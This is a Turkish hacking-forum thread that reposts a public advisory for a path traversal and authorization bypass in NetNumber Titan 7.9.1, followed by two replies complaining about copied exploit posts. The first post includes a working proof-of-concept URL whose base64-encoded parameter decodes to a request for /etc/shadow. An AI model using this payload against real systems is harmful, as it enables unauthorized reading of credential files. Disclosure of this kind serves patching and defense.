Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...





: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 2 Hafta önce   #1
  • Underground Tim
  • Üye Bilgileri
Üyelik tarihi
03/2018
Nereden
KARANLIK
Mesajlar
Konular

Teşekkür (Etti): 39
Teşekkür (Aldı): 70


: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass



# Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass
# Google Dork: N/A
# Date: 4/29/2019
# Exploit Author: MobileNetworkSecurity
# Vendor Homepage: https://www.netnumber.com/products/#data
# Software Link: N/A
# Version: Titan Master 7.9.1
# Tested on: Linux
# CVE : N/A
# Type: WEBAPP

************************************************** ***********************
A Path Traversal issue was discovered in the Web GUI of NetNumber Titan 7.9.1.
When an authenticated user attempts to download a trace file (through drp) by using a ../../ technique, arbitrary files can be downloaded from the server. Since the webserver running with elevated privileges it is possible to download arbitrary files.
The HTTP request can be executed by any (even low privileged) user, so the authorization mechanism can be bypassed.
************************************************** ***********************

Proof of Concept (PoC):

http://X.X.X.X/drp?download=true&path=Ly9TWVNURU0vc3lzdGVtL3RyYWN lP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvd w$$

The vulnerable path parameter is base64 encoded where the equal sign replaced by the dollar sign.

Original payload:
Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li 4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$

Replaced dollar signs:
Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li 4vLi4vLi4vLi4vZXRjL3NoYWRvdw==

Base64 decoded payload:
//SYSTEM/system/trace?download=t&el=../../../../etc/shadow

In the HTTP response you will receive the content of the file.

************************************************** ***********************
The issue has been fixed in the newer version of the software.



___________________________________________

Türkleri öldürebilirsiniz... fakat ASLA YENEMEZSİNİZ


TELEGRAM = @Shadowfire23

 Offline  
 
Alıntı ile Cevapla
Alt 2 Hafta önce   #2
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
01/2016
Nereden
Nebula
Yaş
22
Mesajlar
Konular

Teşekkür (Etti): 113
Teşekkür (Aldı): 853




Bu bilgileri burda kullanabilecek kaç kişi var sence



___________________________________________

"İnsanın özgürlüğü istediği her şeyi yapabilmesinde değil, istemediği hiçbir şeyi yapmak zorunda olmamasındadır."


 Offline  
 
Alıntı ile Cevapla
Alt 2 Hafta önce   #3
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
02/2012
Yaş
17
Mesajlar
Konular

Teşekkür (Etti): 42
Teşekkür (Aldı): 523




Alıntı:
Rootcmd´isimli üyeden Alıntı Mesajı göster
Bu bilgileri burda kullanabilecek kaç kişi var sence
Dur yahu, bu arkadaş Exploit-DB arşivlerini foruma mı aktarıyor ben mi yanlış anladım, serbest yani dış kaynak ile forumu şişirmek? Güzel. Forumda açabileceğim 43.653 başlığım şimdiden hazır.

SAÇ-MA-LIK.



___________________________________________


Konu ivanwasilevic tarafından ( 2 Hafta önce Saat 01:35 ) değiştirilmiştir.. Sebep: hitap şekli + tartışmaya sebebiyet verecek kelimeler bütünü
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau